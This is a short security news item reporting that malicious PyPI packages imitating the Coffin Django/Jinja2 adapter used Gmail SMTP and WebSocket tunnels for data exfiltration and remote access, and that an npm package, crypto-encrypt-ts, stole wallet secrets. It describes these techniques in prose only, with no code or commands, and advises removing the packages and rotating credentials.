HQ/EMEAFind out how we can help your business
Seven malicious Coffin packages from PyPI have allegedly utilised Gmail’s SMTP servers and WebSockets for data exfiltration and RCE.
Based on reports, researchers identified and reported these packages to PyPI, leading to their removal. However, some of these packages had been on PyPI for over four years, with one package reportedly downloaded over 18,000 times.
These packages mimic the legitimate Coffin package, a lightweight adapter for integrating Jinja2 templates into Django projects.
Recent research uncovered risky features focusing on covert remote access and data exfiltration via Gmail.
These packages contained hardcoded Gmail credentials that allowed them to log into the service’s SMTP server to send reconnaissance data, facilitating remote access to the compromised system.
The malicious Coffin packages have leveraged Gmail to bypass security detections.
Since Gmail is a trusted service, firewalls and EDRs will unlikely flag the malicious Coffin packages as suspicious.
After the email signalling stage, the implant connects to a remote server using SSL-based WebSocket. It receives configuration instructions to set up a persistent, encrypted, bidirectional tunnel from the host to the attacker.
Through a ‘Client’ class, the malware reroutes traffic from the remote host to the local system via this tunnel, granting access to internal admin panels and APIs, enabling file transfer, email exfiltration, shell command execution, credential harvesting, and lateral movement.
Furthermore, researchers noted strong indicators of an intent to steal crypto associated with these packages, evidenced by the email addresses and similar tactics employed previously to steal Solana’s private keys.
If repository users have installed any of these packages, it is crucial to remove them immediately and rotate any necessary keys and credentials.
Additionally, a related report that was published nearly simultaneously highlights a crypto-stealing package called ‘crypto-encrypt-ts,’ which can be found on npm.
This package disguises itself as a TypeScript version of the now-unmaintained ‘CryptoJS’ library while exfiltrating cryptocurrency wallet secrets and environment variables to a Better Stack endpoint controlled by threat actors.
This malicious package persists on infected systems through cron jobs and specifically targets wallets with balances exceeding 1,000 units, attempting to steal their private keys.
